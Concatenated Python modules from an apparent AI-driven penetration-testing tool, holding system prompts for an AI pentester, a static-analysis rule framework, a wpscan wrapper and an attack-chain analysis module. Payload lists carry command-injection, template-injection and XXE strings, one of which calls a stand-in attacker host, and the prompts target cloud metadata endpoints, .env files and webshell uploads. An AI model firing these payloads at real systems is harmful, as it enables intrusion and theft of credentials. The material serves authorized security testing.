4. Try various bypass techniques (IP encoding, DNS rebinding)
5. Test for blind SSRF with callback server
6. Attempt protocol smuggling if applicable

TARGET CLOUD METADATA:
- AWS: http://169.254.169.254/latest/meta-data/
- GCP: http://metadata.google.internal/computeMetadata/v1/
- Azure: http://169.254.169.254/metadata/instance

OUTPUT FORMAT:
<finding>
<title>SSRF Vulnerability in [location]</title>
<severity>critical|high</severity>
<description>What internal resources can be accessed</description>
<evidence>Request/response showing SSRF</evidence>
<location>Vulnerable parameter</location>
<remediation>Input validation and allowlist approach</remediation>
<cwe>CWE-918</cwe>
</finding>""",
    user_prompt_template="Test {{ target }} for SSRF vulnerabilities. Check for access to internal resources and cloud metadata."
))


# Remote Code Execution Expert
_register_vuln_prompt(VulnerabilityPrompt(
    id="rce",
    name="Remote Code Execution",
    category="injection",
    description="Test for RCE vulnerabilities including command injection and deserialization",
    owasp_category="A03:2021-Injection",
    cwe_ids=["CWE-78", "CWE-94", "CWE-502"],
    testing_techniques=[
        "OS command injection", "Code injection", "Template injection",
        "Deserialization attacks", "File upload to RCE"
    ],
    payloads=[
        "; id", "| id", "` id `", "$(id)", "; sleep 5",
        "{{7*7}}", "${7*7}", "<%= 7*7 %>", "#{7*7}"
    ],
    detection_patterns=[
        "uid=", "root:", "command output", "sleep delay",
        "49", "template evaluated"
    ],
    system_prompt="""You are an expert RCE penetration tester specializing in command injection and code execution.

EXPERTISE:
- OS Command Injection (semicolon, pipe, backtick, $())
- Server-Side Template Injection (Jinja2, Twig, Freemarker, etc.)
- Code Injection (eval, exec, Function constructor)
- Insecure Deserialization (Java, PHP, Python, .NET)
- File Upload leading to RCE

METHODOLOGY:
1. Identify input vectors that might reach system commands
2. Test for time-based command injection
3. Check for template injection with math expressions
4. Test file upload for webshell execution
5. Look for deserialization endpoints
6. Escalate to full RCE if vulnerability confirmed

IMPORTANT:
- Use benign payloads like `id`, `whoami`, or `sleep` for detection
- Avoid destructive commands
- Document exact payloads and responses

OUTPUT FORMAT:
<finding>
<title>RCE Vulnerability: [type]</title>
<severity>critical</severity>
<description>How code execution is achieved</description>
<evidence>Payload and command output</evidence>
<location>Vulnerable parameter/endpoint</location>
<remediation>Input sanitization and avoiding dangerous functions</remediation>
<cwe>CWE-78</cwe>
</finding>""",
    user_prompt_template="Test {{ target }} for remote code execution vulnerabilities. Check command injection, SSTI, and deserialization."
))


# XML External Entity Expert
_register_vuln_prompt(VulnerabilityPrompt(
    id="xxe",
    name="XML External Entity",
    category="injection",
    description="Test for XXE vulnerabilities in XML parsers",
    owasp_category="A05:2021-Security-Misconfiguration",
    cwe_ids=["CWE-611"],
    testing_techniques=[
        "Classic XXE", "Blind XXE via OOB", "XXE to SSRF",
        "XXE via file upload", "XXE in SOAP"
    ],
    payloads=[
        '<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>',
        '<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://attacker.com/">]>',
        '<?xml version="1.0"?><!DOCTYPE data [<!ENTITY file SYSTEM "file:///etc/passwd">]><data>&file;</data>'
    ],
    detection_patterns=[
        "root:", "/etc/passwd content", "external entity resolved",
        "DTD processed"
    ],
    system_prompt="""You are an expert XXE penetration tester.

EXPERTISE:
- Classic XXE for file reading
- Blind XXE via out-of-band exfiltration
- XXE to SSRF escalation
- XXE in various contexts (SOAP, SVG, DOCX, etc.)
- XXE filter bypass techniques

METHODOLOGY:
1. Identify XML processing endpoints
2. Test for basic XXE with /etc/passwd or win.ini
3. If no direct output, try OOB XXE
4. Check file upload for XXE in DOCX/SVG
5. Test SOAP endpoints if present
6. Attempt XXE to SSRF

OUTPUT FORMAT:
<finding>
<title>XXE Vulnerability in [location]</title>
<severity>high|critical</severity>
<description>What can be achieved via XXE</description>
<evidence>XXE payload and extracted data</evidence>
<location>XML processing endpoint</location>
<remediation>Disable external entities in XML parser</remediation>
<cwe>CWE-611</cwe>
</finding>""",
    user_prompt_template="Test {{ target }} for XXE vulnerabilities in XML processing endpoints."
))


# Business Logic Expert
_register_vuln_prompt(VulnerabilityPrompt(
    id="business_logic",
    name="Business Logic Flaws",
    category="logic",
    description="Test for business logic vulnerabilities and workflow bypasses",
    owasp_category="A04:2021-Insecure-Design",
    cwe_ids=["CWE-840", "CWE-841"],
    testing_techniques=[
        "Workflow bypass", "Race conditions", "Price manipulation",
        "Coupon/discount abuse", "Negative quantity", "Feature abuse"
    ],
    payloads=[],
    detection_patterns=[
        "Unexpected state", "Invalid transition", "Business rule violated"
    ],
    system_prompt="""You are an expert in business logic vulnerability testing.

EXPERTISE:
- Workflow/state machine bypasses
- Race condition exploitation
- Price and quantity manipulation
- Coupon/voucher abuse
- Feature misuse
- Time-of-check to time-of-use (TOCTOU)

METHODOLOGY:
1. Map the application's business workflows
2. Identify critical business rules
3. Test for workflow step skipping
4. Check for race conditions in critical operations
5. Test numeric inputs for manipulation
6. Look for feature abuse scenarios

FOCUS AREAS:
- Payment processing
- Order management
- User registration/verification
- Voting/rating systems
- Resource allocation
- Multi-step processes

OUTPUT FORMAT:
<finding>
<title>Business Logic Flaw: [type]</title>
<severity>high|medium</severity>
<description>What business rule can be bypassed</description>
<evidence>Steps showing the logic bypass</evidence>
<location>Affected workflow/feature</location>
<remediation>Business rule enforcement</remediation>
<cwe>CWE-840</cwe>
</finding>""",
    user_prompt_template="Test {{ target }} for business logic vulnerabilities. Focus on {{ focus_area if focus_area else 'critical workflows' }}."
))


# Information Disclosure Expert
_register_vuln_prompt(VulnerabilityPrompt(
    id="info_disclosure",
    name="Information Disclosure",
    category="information",
    description="Test for sensitive information exposure",
    owasp_category="A01:2021-Broken-Access-Control",
    cwe_ids=["CWE-200", "CWE-209", "CWE-532"],
    testing_techniques=[
        "Error message analysis", "Source code disclosure",
        "Backup file discovery", "Debug endpoint discovery",
        "API documentation exposure"
    ],
    payloads=[
        ".git/HEAD", ".env", "web.config", "phpinfo.php",
        ".DS_Store", "backup.sql", "debug", "trace"
    ],
    detection_patterns=[
        "Stack trace", "Internal path", "Database credentials",
        "API key", "Password", "Secret"
    ],
    system_prompt="""You are an expert in information disclosure vulnerability testing.

EXPERTISE:
- Verbose error message analysis
- Source code and configuration file discovery
- Backup and temporary file enumeration
- Debug and admin endpoint discovery
- API documentation and schema exposure
- Metadata and comment analysis

METHODOLOGY:
1. Trigger errors to analyze verbosity
2. Check for common sensitive files
3. Look for exposed version control
4. Find debug/admin endpoints
5. Analyze HTTP headers for information
6. Check for API documentation exposure

COMMON TARGETS:
- /.git/, /.svn/, /.hg/
- /.env, /config.php, /web.config
- /phpinfo.php, /server-status
- /swagger.json, /openapi.yaml
- Backup files (.bak, .old, ~)

OUTPUT FORMAT:
<finding>
<title>Information Disclosure: [type]</title>
<severity>medium|low|info</severity>
<description>What sensitive information is exposed</description>
<evidence>The disclosed information</evidence>
<location>Where the disclosure occurs</location>
<remediation>How to prevent the disclosure</remediation>
<cwe>CWE-200</cwe>
</finding>""",
    user_prompt_template="Test {{ target }} for information disclosure vulnerabilities. Check for exposed configuration, errors, and sensitive files."
))


class SkillPrompts:
    """
    Manager for security skill prompts.
    Provides access to vulnerability-specific prompts with Jinja2 templating.
    """

    def __init__(self, custom_prompts_dir: Optional[Path] = None):
        """Initialize with optional custom prompts directory."""
        self.custom_prompts_dir = custom_prompts_dir
        self._env: Optional[Environment] = None

        if custom_prompts_dir and custom_prompts_dir.exists():
            self._env = Environment(
                loader=FileSystemLoader(str(custom_prompts_dir)),
                autoescape=select_autoescape(['html', 'xml'])
            )

    def get_prompt(self, prompt_id: str) -> Optional[VulnerabilityPrompt]:
        """Get a vulnerability prompt by ID."""
        return VULNERABILITY_PROMPTS.get(prompt_id)

    def get_all_prompts(self) -> Dict[str, VulnerabilityPrompt]:
        """Get all registered vulnerability prompts."""
        return VULNERABILITY_PROMPTS.copy()

    def get_prompts_by_category(self, category: str) -> List[VulnerabilityPrompt]:
        """Get all prompts in a specific category."""
        return [p for p in VULNERABILITY_PROMPTS.values() if p.category == category]

    def get_system_prompt(self, prompt_id: str) -> str:
        """Get the system prompt for a vulnerability type."""
        prompt = self.get_prompt(prompt_id)
        return prompt.system_prompt if prompt else ""

    def render_user_prompt(
        self,
        prompt_id: str,
        target: str,
        **kwargs
    ) -> str:
        """Render a user prompt template with variables."""
        prompt = self.get_prompt(prompt_id)
        if not prompt:
            return f"Test {target} for security vulnerabilities."

        # Use Jinja2 to render the template
        from jinja2 import Template
        template = Template(prompt.user_prompt_template)
        return template.render(target=target, **kwargs)

    def get_combined_prompt(
        self,
        prompt_ids: List[str],
        target: str,
        **kwargs
    ) -> str:
        """Combine multiple vulnerability prompts into one comprehensive prompt."""
        prompts = [self.get_prompt(pid) for pid in prompt_ids if self.get_prompt(pid)]

        if not prompts:
            return f"Perform comprehensive security testing on {target}."

        combined_system = "You are a comprehensive security testing expert with the following specializations:\n\n"

        for i, prompt in enumerate(prompts, 1):
            combined_system += f"{i}. {prompt.name}: {prompt.description}\n"

        combined_system += "\n" + "\n\n---\n\n".join([p.system_prompt for p in prompts])

        return combined_system

    def list_prompt_ids(self) -> List[str]:
        """List all available prompt IDs."""
        return list(VULNERABILITY_PROMPTS.keys())


# Export commonly used prompts
SQLI_PROMPT = VULNERABILITY_PROMPTS.get("sqli")
XSS_PROMPT = VULNERABILITY_PROMPTS.get("xss")
IDOR_PROMPT = VULNERABILITY_PROMPTS.get("idor")
AUTH_PROMPT = VULNERABILITY_PROMPTS.get("auth")
SSRF_PROMPT = VULNERABILITY_PROMPTS.get("ssrf")
RCE_PROMPT = VULNERABILITY_PROMPTS.get("rce")
XXE_PROMPT = VULNERABILITY_PROMPTS.get("xxe")


__all__ = [
    "SkillPrompts",
    "VulnerabilityPrompt",
    "VULNERABILITY_PROMPTS",
    "SQLI_PROMPT",
    "XSS_PROMPT",
    "IDOR_PROMPT",
    "AUTH_PROMPT",
    "SSRF_PROMPT",
    "RCE_PROMPT",
    "XXE_PROMPT",
]



"""
AIPTX SAST Rules Base - Rule Definition Framework

Provides the base classes for defining security rules
that can be matched against parsed code.
"""

from __future__ import annotations

import re
from dataclasses import dataclass, field
from enum import Enum
from typing import Any, Callable, Optional

from aipt_v2.sast.parsers.base import ParsedFile, CodeLocation


class RuleSeverity(str, Enum):
    """Severity levels for security rules."""
    CRITICAL = "critical"
    HIGH = "high"
    MEDIUM = "medium"
    LOW = "low"
    INFO = "info"


class RuleCategory(str, Enum):
    """Categories of security rules."""
    INJECTION = "injection"          # SQL, Command, LDAP, etc.
    XSS = "xss"                       # Cross-site scripting
    CRYPTO = "crypto"                 # Cryptography issues
    AUTH = "auth"                     # Authentication/Authorization
    CONFIG = "config"                 # Configuration issues
    SECRETS = "secrets"               # Hardcoded secrets
    SSRF = "ssrf"                     # Server-side request forgery
    PATH_TRAVERSAL = "path_traversal" # Path traversal/LFI
    DESERIALIZATION = "deserialization"
    XXE = "xxe"                       # XML external entities
    LOGGING = "logging"               # Logging sensitive data
    ERROR_HANDLING = "error_handling"
    RACE_CONDITION = "race_condition"
    MISCELLANEOUS = "misc"


@dataclass
class Rule:
    """
    Security rule definition.

    A rule defines a pattern that indicates a security issue.
    Rules can match against:
    - Raw code (regex patterns)
    - Parsed structures (AST patterns)
    - Data flows (source to sink)
    """
    id: str
    name: str
    description: str
    severity: RuleSeverity
    category: RuleCategory
    languages: list[str]  # Languages this rule applies to

    # Matching patterns (use one or more)
    pattern: Optional[str] = None  # Regex pattern
    patterns: list[str] = field(default_factory=list)  # Multiple patterns
    negative_patterns: list[str] = field(default_factory=list)  # Patterns that negate match

    # CWE/OWASP mappings
    cwe_ids: list[str] = field(default_factory=list)
    owasp_ids: list[str] = field(default_factory=list)

    # Remediation
    remediation: str = ""
    references: list[str] = field(default_factory=list)

    # Advanced matching
    source_patterns: list[str] = field(default_factory=list)  # For taint tracking
    sink_patterns: list[str] = field(default_factory=list)

    # Metadata
    enabled: bool = True
    tags: list[str] = field(default_factory=list)

    def matches_line(self, line: str) -> bool:
        """
        Check if rule matches a line of code.

        Args:
            line: Line of code to check

        Returns:
            True if rule matches
        """
        # Check negative patterns first
        for neg_pattern in self.negative_patterns:
            if re.search(neg_pattern, line, re.IGNORECASE):
                return False

        # Check main pattern
        if self.pattern:
            if re.search(self.pattern, line, re.IGNORECASE):
                return True

        # Check multiple patterns
        for pattern in self.patterns:
            if re.search(pattern, line, re.IGNORECASE):
                return True

        return False


@dataclass
class RuleMatch:
    """
    A match of a rule against code.

    Contains all information needed to report the finding.
    """
    rule: Rule
    file_path: str
    line: int
    column: int = 0
    end_line: Optional[int] = None
    code_snippet: str = ""
    context_before: list[str] = field(default_factory=list)
    context_after: list[str] = field(default_factory=list)
    matched_text: str = ""
    confidence: float = 0.8
    metadata: dict = field(default_factory=dict)

    @property
    def location(self) -> CodeLocation:
        return CodeLocation(
            file_path=self.file_path,
            line=self.line,
            column=self.column,
            end_line=self.end_line,
        )

    def to_finding_dict(self) -> dict:
        """Convert to finding dictionary."""
        return {
            "rule_id": self.rule.id,
            "title": self.rule.name,
            "description": self.rule.description,
            "severity": self.rule.severity.value,
            "category": self.rule.category.value,
            "file_path": self.file_path,
            "line": self.line,
            "column": self.column,
            "code_snippet": self.code_snippet,
            "remediation": self.rule.remediation,
            "cwe_ids": self.rule.cwe_ids,
            "owasp_ids": self.rule.owasp_ids,
            "confidence": self.confidence,
            "references": self.rule.references,
        }


class RuleSet:
    """
    Collection of security rules for a language or category.

    Provides efficient matching against parsed files.
    """

    def __init__(
        self,
        language: str,
        rules: Optional[list[Rule]] = None,
        name: str = "",
    ):
        """
        Initialize rule set.

        Args:
            language: Target language
            rules: List of rules
            name: Optional name for the rule set
        """
        self.language = language
        self.name = name or f"{language}_rules"
        self._rules: list[Rule] = rules or []

    def add_rule(self, rule: Rule) -> None:
        """Add a rule to the set."""
        self._rules.append(rule)

    def get_rules(self, enabled_only: bool = True) -> list[Rule]:
        """Get all rules."""
        if enabled_only:
            return [r for r in self._rules if r.enabled]
        return self._rules

    def get_rules_by_category(self, category: RuleCategory) -> list[Rule]:
        """Get rules by category."""
        return [r for r in self._rules if r.category == category and r.enabled]

    def get_rules_by_severity(self, severity: RuleSeverity) -> list[Rule]:
        """Get rules by severity."""
        return [r for r in self._rules if r.severity == severity and r.enabled]

    def match_file(self, parsed: ParsedFile) -> list[RuleMatch]:
        """
        Match all rules against a parsed file.

        Args:
            parsed: Parsed file to check

        Returns:
            List of rule matches
        """
        matches = []

        for rule in self.get_rules():
            # Check language compatibility
            if self.language.lower() not in [l.lower() for l in rule.languages]:
                continue

            # Match against each line
            for i, line in enumerate(parsed.lines, 1):
                if rule.matches_line(line):
                    # Get context
                    context_before = parsed.lines[max(0, i-4):i-1]
                    context_after = parsed.lines[i:min(len(parsed.lines), i+3)]

                    match = RuleMatch(
                        rule=rule,
                        file_path=parsed.file_path,
                        line=i,
                        code_snippet=line.strip(),
                        context_before=context_before,
                        context_after=context_after,
                        matched_text=line.strip(),
                    )
                    matches.append(match)

        return matches

    def match_content(
        self, content: str, file_path: str
    ) -> list[RuleMatch]:
        """
        Match rules against raw content.

        Args:
            content: Source code content
            file_path: File path for reporting

        Returns:
            List of rule matches
        """
        matches = []
        lines = content.split("\n")

        for rule in self.get_rules():
            for i, line in enumerate(lines, 1):
                if rule.matches_line(line):
                    context_before = lines[max(0, i-4):i-1]
                    context_after = lines[i:min(len(lines), i+3)]

                    match = RuleMatch(
                        rule=rule,
                        file_path=file_path,
                        line=i,
                        code_snippet=line.strip(),
                        context_before=context_before,
                        context_after=context_after,
                    )
                    matches.append(match)

        return matches

    def __len__(self) -> int:
        return len(self._rules)

    def __iter__(self):
        return iter(self._rules)



"""
AIPTX WPScan Scanner
====================

Scanner for wpscan - WordPress security scanner.
https://github.com/wpscanteam/wpscan
"""

import asyncio
import json
import logging
import shutil
from dataclasses import dataclass, field
from datetime import datetime
from typing import Any, Dict, List, Optional

from .base import BaseScanner, ScanResult, ScanFinding, ScanSeverity

logger = logging.getLogger(__name__)


@dataclass
class WPScanConfig:
    """Configuration for wpscan scanner."""

    # Enumeration options
    enumerate_plugins: bool = True  # vp = vulnerable plugins
    enumerate_themes: bool = True   # vt = vulnerable themes
    enumerate_users: bool = True    # u = users
    enumerate_config_backups: bool = True  # cb = config backups
    enumerate_db_exports: bool = True  # dbe = database exports
    enumerate_all_plugins: bool = False  # ap = all plugins
    enumerate_all_themes: bool = False  # at = all themes

    # Detection mode
    detection_mode: str = "mixed"  # passive, aggressive, mixed

    # API token for vulnerability data
    api_token: Optional[str] = None

    # Request options
    user_agent: str = ""
    headers: Dict[str, str] = field(default_factory=dict)
    cookies: str = ""
    proxy: Optional[str] = None

    # Rate limiting
    throttle: int = 0  # Milliseconds between requests
    request_timeout: int = 60

    # Output
    format: str = "json"

    # Stealth
    random_user_agent: bool = False
    stealthy: bool = False


class WPScanScanner(BaseScanner):
    """
    Scanner for wpscan - WordPress vulnerability scanner.

    Detects:
    - WordPress version vulnerabilities
    - Vulnerable plugins and themes
    - User enumeration
    - Configuration issues
    - Security misconfigurations

    Example:
        scanner = WPScanScanner()
        result = await scanner.scan("https://wordpress-site.com")

        for finding in result.findings:
            print(f"{finding.severity}: {finding.title}")
    """

    def __init__(self, config: Optional[WPScanConfig] = None):
        self.config = config or WPScanConfig()
        self._process: Optional[asyncio.subprocess.Process] = None
        self._running = False

    def is_available(self) -> bool:
        """Check if wpscan is installed."""
        return shutil.which("wpscan") is not None

    async def scan(
        self,
        target: str,
        **kwargs
    ) -> ScanResult:
        """
        Run wpscan against target.

        Args:
            target: WordPress site URL
            **kwargs: Additional options

        Returns:
            ScanResult with vulnerability findings
        """
        result = ScanResult(scanner="wpscan", target=target)
        result.start_time = datetime.utcnow()
        self._running = True

        try:
            cmd = self._build_command(target)
            logger.debug(f"Running: {' '.join(cmd)}")

            process = await asyncio.create_subprocess_exec(
                *cmd,
                stdout=asyncio.subprocess.PIPE,
                stderr=asyncio.subprocess.PIPE,
            )
            self._process = process

            stdout, stderr = await asyncio.wait_for(
                process.communicate(),
                timeout=kwargs.get("timeout", 600)
            )

            result.raw_output = stdout.decode("utf-8", errors="replace")
            result.findings = self.parse_output(result.raw_output)
            result.status = "completed"

        except asyncio.TimeoutError:
            result.status = "failed"
            result.errors.append("Scan timed out")
        except Exception as e:
            result.status = "failed"
            result.errors.append(str(e))
            logger.error(f"wpscan failed: {e}")
        finally:
            self._running = False
            result.end_time = datetime.utcnow()
            if result.start_time:
                result.duration_seconds = (result.end_time - result.start_time).total_seconds()

        return result

    def _build_command(self, target: str) -> List[str]:
        """Build wpscan command."""
        cmd = ["wpscan", "--url", target]

        # Enumeration
        enumerate_flags = []
        if self.config.enumerate_plugins:
            enumerate_flags.append("vp")
        if self.config.enumerate_themes:
            enumerate_flags.append("vt")
        if self.config.enumerate_users:
            enumerate_flags.append("u")
        if self.config.enumerate_config_backups:
            enumerate_flags.append("cb")
        if self.config.enumerate_db_exports:
            enumerate_flags.append("dbe")
        if self.config.enumerate_all_plugins:
            enumerate_flags.append("ap")
        if self.config.enumerate_all_themes:
            enumerate_flags.append("at")

        if enumerate_flags:
            cmd.extend(["--enumerate", ",".join(enumerate_flags)])

        # Detection mode
        cmd.extend(["--detection-mode", self.config.detection_mode])

        # API token
        if self.config.api_token:
            cmd.extend(["--api-token", self.config.api_token])

        # Request options
        if self.config.user_agent:
            cmd.extend(["--user-agent", self.config.user_agent])

        for key, value in self.config.headers.items():
            cmd.extend(["--headers", f"{key}: {value}"])

        if self.config.cookies:
            cmd.extend(["--cookie", self.config.cookies])

        if self.config.proxy:
            cmd.extend(["--proxy", self.config.proxy])

        # Rate limiting
        if self.config.throttle > 0:
            cmd.extend(["--throttle", str(self.config.throttle)])

        cmd.extend(["--request-timeout", str(self.config.request_timeout)])

        # Output format
        cmd.extend(["--format", self.config.format])

        # Stealth options
        if self.config.random_user_agent:
            cmd.append("--random-user-agent")
        if self.config.stealthy:
            cmd.append("--stealthy")

        # No banner
        cmd.append("--no-banner")

        return cmd

    def parse_output(self, output: str) -> List[ScanFinding]:
        """Parse wpscan JSON output."""
        findings = []

        try:
            data = json.loads(output)
        except json.JSONDecodeError:
            # Try to extract findings from text output
            return self._parse_text_output(output)

        # WordPress version
        if "version" in data:
            version_info = data["version"]
            if version_info.get("vulnerabilities"):
                for vuln in version_info["vulnerabilities"]:
                    findings.append(self._vuln_to_finding(vuln, "WordPress Core"))

            # Version info finding
            if version_info.get("number"):
                findings.append(ScanFinding(
                    title=f"WordPress Version: {version_info['number']}",
                    severity=ScanSeverity.INFO,
                    description=f"WordPress {version_info['number']} detected",
                    scanner="wpscan",
                    tags=["wordpress", "version"],
                ))

        # Main theme
        if "main_theme" in data and data["main_theme"]:
            theme = data["main_theme"]
            if theme.get("vulnerabilities"):
                for vuln in theme["vulnerabilities"]:
                    findings.append(self._vuln_to_finding(vuln, f"Theme: {theme.get('slug', 'unknown')}"))

        # Plugins
        if "plugins" in data:
            for plugin_name, plugin_data in data["plugins"].items():
                if plugin_data.get("vulnerabilities"):
                    for vuln in plugin_data["vulnerabilities"]:
                        findings.append(self._vuln_to_finding(vuln, f"Plugin: {plugin_name}"))

                # Outdated plugin
                if plugin_data.get("outdated"):
                    findings.append(ScanFinding(
                        title=f"Outdated Plugin: {plugin_name}",
                        severity=ScanSeverity.LOW,
                        description=f"Plugin {plugin_name} version {plugin_data.get('version', 'unknown')} is outdated",
                        scanner="wpscan",
                        tags=["wordpress", "plugin", "outdated"],
                    ))

        # Users
        if "users" in data:
            for username, user_data in data["users"].items():
                findings.append(ScanFinding(
                    title=f"User Enumerated: {username}",
                    severity=ScanSeverity.LOW,
                    description=f"WordPress user '{username}' discovered (ID: {user_data.get('id', 'unknown')})",
                    scanner="wpscan",
                    tags=["wordpress", "user", "enumeration"],
                ))

        # Config backups
        if "config_backups" in data:
            for backup in data["config_backups"]:
                findings.append(ScanFinding(
                    title="Config Backup Found",
                    severity=ScanSeverity.HIGH,
                    description=f"Configuration backup file found: {backup}",
                    url=backup,
                    scanner="wpscan",
                    tags=["wordpress", "config", "backup", "sensitive"],
                ))

        # DB exports
        if "db_exports" in data:
            for export in data["db_exports"]:
                findings.append(ScanFinding(
                    title="Database Export Found",
                    severity=ScanSeverity.CRITICAL,
                    description=f"Database export file found: {export}",
                    url=export,
                    scanner="wpscan",
                    tags=["wordpress", "database", "export", "sensitive"],
                ))

        # Interesting findings
        if "interesting_findings" in data:
            for item in data["interesting_findings"]:
                severity = ScanSeverity.INFO
                if "readme" in item.get("url", "").lower():
                    severity = ScanSeverity.LOW
                elif "debug" in item.get("url", "").lower():
                    severity = ScanSeverity.MEDIUM

                findings.append(ScanFinding(
                    title=item.get("to_s", "Interesting Finding"),
                    severity=severity,
                    description=item.get("to_s", ""),
                    url=item.get("url", ""),
                    scanner="wpscan",
                    tags=["wordpress", "interesting"],
                ))

        return findings

    def _vuln_to_finding(self, vuln: Dict[str, Any], component: str) -> ScanFinding:
        """Convert vulnerability data to finding."""
        title = vuln.get("title", "Unknown Vulnerability")

        # Determine severity from vuln type
        severity = ScanSeverity.MEDIUM
        vuln_type = vuln.get("vuln_type", "").lower()
        title_lower = title.lower()

        if any(x in title_lower for x in ["rce", "remote code", "sql injection", "sqli"]):
            severity = ScanSeverity.CRITICAL
        elif any(x in title_lower for x in ["xss", "csrf", "auth bypass", "privilege"]):
            severity = ScanSeverity.HIGH
        elif any(x in title_lower for x in ["disclosure", "path traversal", "lfi"]):
            severity = ScanSeverity.HIGH

        # Extract CVE if present
        cve = None
        refs = vuln.get("references", {})
        if "cve" in refs:
            cve_list = refs["cve"]
            if cve_list:
                cve = f"CVE-{cve_list[0]}" if not str(cve_list[0]).startswith("CVE") else cve_list[0]

        return ScanFinding(
            title=f"{component}: {title[:80]}",
            severity=severity,
            description=title,
            cwe=vuln.get("cwe", ""),
            scanner="wpscan",
            tags=["wordpress", "vulnerability", vuln_type] if vuln_type else ["wordpress", "vulnerability"],
        )

    def _parse_text_output(self, output: str) -> List[ScanFinding]:
        """Parse text output when JSON fails."""
        findings = []

        # Look for vulnerability indicators
        if "[!]" in output:
            for line in output.split("\n"):
                if "[!]" in line:
                    findings.append(ScanFinding(
                        title=line.replace("[!]", "").strip()[:100],
                        severity=ScanSeverity.MEDIUM,
                        description=line.strip(),
                        scanner="wpscan",
                        tags=["wordpress"],
                    ))

        return findings

    async def stop(self) -> bool:
        """Stop running scan."""
        if self._process and self._running:
            self._process.terminate()
            try:
                await asyncio.wait_for(self._process.wait(), timeout=5)
            except asyncio.TimeoutError:
                self._process.kill()
            self._running = False
            return True
        return False



"""
AIPTX Chain Exploit Analysis
=============================

Advanced attack chain detection and analysis engine that correlates
findings across phases to identify multi-step attack paths.

Features:
- Multi-hop attack path detection
- MITRE ATT&CK technique mapping
- Confidence scoring based on evidence strength
- Risk prioritization and impact assessment
- AI-ready chain descriptions for Ollama analysis
- Exploit prerequisite and dependency tracking

This module transforms isolated vulnerability findings into
actionable attack narratives for penetration testers.
"""

import json
import logging
from dataclasses import dataclass, field
from enum import Enum
from typing import Any, Dict, List, Optional, Set, Tuple
from collections import defaultdict

logger = logging.getLogger(__name__)


# ============================================================================
# MITRE ATT&CK Technique Mapping
# ============================================================================

class MitreTactic(str, Enum):
    """MITRE ATT&CK Tactics (Enterprise)."""
    RECONNAISSANCE = "reconnaissance"
    RESOURCE_DEV = "resource-development"
    INITIAL_ACCESS = "initial-access"
    EXECUTION = "execution"
    PERSISTENCE = "persistence"
    PRIVILEGE_ESC = "privilege-escalation"
    DEFENSE_EVASION = "defense-evasion"
    CREDENTIAL_ACCESS = "credential-access"
    DISCOVERY = "discovery"
    LATERAL_MOVEMENT = "lateral-movement"
    COLLECTION = "collection"
    COMMAND_CONTROL = "command-and-control"
    EXFILTRATION = "exfiltration"
    IMPACT = "impact"


@dataclass
class MitreTechnique:
    """MITRE ATT&CK Technique reference."""
    id: str  # e.g., "T1190"
    name: str
    tactic: MitreTactic
    description: str
    url: str = ""

    def __post_init__(self):
        if not self.url:
            self.url = f"https://attack.mitre.org/techniques/{self.id}/"


# Common technique mappings
TECHNIQUE_MAP = {
    # Initial Access
    "sqli": MitreTechnique("T1190", "Exploit Public-Facing Application", MitreTactic.INITIAL_ACCESS,
                           "SQL injection to gain initial access"),
    "rce": MitreTechnique("T1190", "Exploit Public-Facing Application", MitreTactic.INITIAL_ACCESS,
                          "Remote code execution vulnerability"),
    "default_creds": MitreTechnique("T1078", "Valid Accounts", MitreTactic.INITIAL_ACCESS,
                                    "Default or weak credentials"),
    "xss": MitreTechnique("T1189", "Drive-by Compromise", MitreTactic.INITIAL_ACCESS,
                          "Cross-site scripting for session hijacking"),

    # Credential Access
    "credential_dump": MitreTechnique("T1003", "OS Credential Dumping", MitreTactic.CREDENTIAL_ACCESS,
                                      "Dumping credentials from database or memory"),
    "brute_force": MitreTechnique("T1110", "Brute Force", MitreTactic.CREDENTIAL_ACCESS,
                                  "Password guessing or cracking"),
    "password_spray": MitreTechnique("T1110.003", "Password Spraying", MitreTactic.CREDENTIAL_ACCESS,
                                     "Single password against many accounts"),

    # Privilege Escalation
    "priv_esc": MitreTechnique("T1068", "Exploitation for Privilege Escalation", MitreTactic.PRIVILEGE_ESC,
                               "Escalating privileges through vulnerability"),
    "sudo_abuse": MitreTechnique("T1548.003", "Sudo and Sudo Caching", MitreTactic.PRIVILEGE_ESC,
                                 "Abusing sudo misconfigurations"),

    # Lateral Movement
    "lateral_ssh": MitreTechnique("T1021.004", "SSH", MitreTactic.LATERAL_MOVEMENT,
                                  "Using SSH for lateral movement"),
    "lateral_smb": MitreTechnique("T1021.002", "SMB/Windows Admin Shares", MitreTactic.LATERAL_MOVEMENT,
                                  "Using SMB for lateral movement"),
    "pass_the_hash": MitreTechnique("T1550.002", "Pass the Hash", MitreTactic.LATERAL_MOVEMENT,
                                    "Using password hashes for authentication"),

    # Exfiltration
    "data_exfil": MitreTechnique("T1567", "Exfiltration Over Web Service", MitreTactic.EXFILTRATION,
                                 "Exfiltrating data via web channels"),

    # Discovery
    "network_scan": MitreTechnique("T1046", "Network Service Discovery", MitreTactic.DISCOVERY,
                                   "Scanning for network services"),
    "subdomain_enum": MitreTechnique("T1596.001", "DNS/Passive DNS", MitreTactic.RECONNAISSANCE,
                                     "Subdomain enumeration"),
}


# ============================================================================
# Chain Analysis Data Structures
# ============================================================================

class ChainConfidence(str, Enum):
    """Confidence level in attack chain viability."""
    CONFIRMED = "confirmed"  # Verified through exploitation
    HIGH = "high"            # Strong evidence, likely exploitable
    MEDIUM = "medium"        # Moderate evidence, possible
    LOW = "low"              # Weak evidence, speculative
    THEORETICAL = "theoretical"  # Possible but no direct evidence


class ChainImpact(str, Enum):
    """Impact level of successful attack chain."""
    CRITICAL = "critical"    # Full system compromise, data breach
    HIGH = "high"            # Significant access or data exposure
    MEDIUM = "medium"        # Limited access or information disclosure
    LOW = "low"              # Minimal impact


@dataclass
class ChainNode:
    """
    A single node in an attack chain representing one step.
    """
    id: str
    finding_id: str
    technique: Optional[MitreTechnique]
    action: str  # What the attacker does
    result: str  # What they achieve
    prerequisites: List[str] = field(default_factory=list)  # Required prior steps
    evidence_strength: float = 0.5  # 0-1 confidence in this step


@dataclass
class AttackChain:
    """
    A complete attack chain from initial access to impact.
    """
    id: str
    name: str
    description: str
    nodes: List[ChainNode]
    confidence: ChainConfidence
    impact: ChainImpact
    mitre_tactics: List[MitreTactic]

    # Risk scoring
    risk_score: float = 0.0  # 0-100
    exploitability: float = 0.0  # 0-1
    business_impact: float = 0.0  # 0-1

    # Metadata
    target_assets: List[str] = field(default_factory=list)
    recommended_tools: List[str] = field(default_factory=list)

